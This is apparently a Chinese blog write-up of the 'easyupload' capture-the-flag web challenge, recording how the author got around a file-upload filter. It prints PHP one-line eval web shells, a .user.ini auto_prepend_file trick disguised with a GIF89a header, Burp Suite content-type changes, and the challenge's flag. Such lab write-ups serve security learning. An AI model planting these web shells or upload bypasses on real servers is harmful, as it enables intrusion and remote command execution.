攻防世界--easyupload

成为ctf全栈之路之web第十题

打开题目场景得到:

猜测是利用文件上传漏洞,菜鸟一枚不太懂web知识就去看了一下wp,这里别的博主有提到php一句话木马,(虽然对本题没有作用),但我还是去看了一眼,代码如下:

<?php eval($_POST['cmd']); ?>

将这个代码写成一个php文件进行上传网页就可以做到一句话木马。关于一句话木马的解释:php一句话木马详解_笔记大全_设计学院

这里记录一个错误就是当这里的一句话木马写成了如上的样子,网页会直接发生错误跳转黑屏,实际上应该写成: 

<?php @eval($POST['cmd']); ?>

@符号的意思是不报错,即使执行错误,也不报错

还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛) 

2023.09.16对文件上传漏洞系统的学习了一下,重新做了一遍:第一步,直接上传一句话木马:

<?php @eval($_REQUEST['a']); ?>

php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)

第三步,使用.use.ni,文件内容为GIF89a                  
auto_prepend_file=eval.jpg

GIF89a                  
auto_prepend_file=eval.jpg

然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)

GIF89a
<?=eval($_POST['cmd']);?>
v

然后发现可以成功上传,第五步,进行网页检查的网络页面得知网址,打开 蚁剑添加数据,密码就是上面写的cmd,然后打开文件管理选择根目录发现有一个flag文件打开得到flag:cyberpeace{0ef988dc87e576bdff7013e2a86a2d2e}

参考:攻防世界—easyupload_Len1Mi的博客-CSDN博客 

 Web-文件上传漏洞总结_kali-Myon的博客-CSDN博客

 PHP数据接收变量$_GET、$_POST 、$_REQUEST区别_木偶跳舞的博客-CSDN博客

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值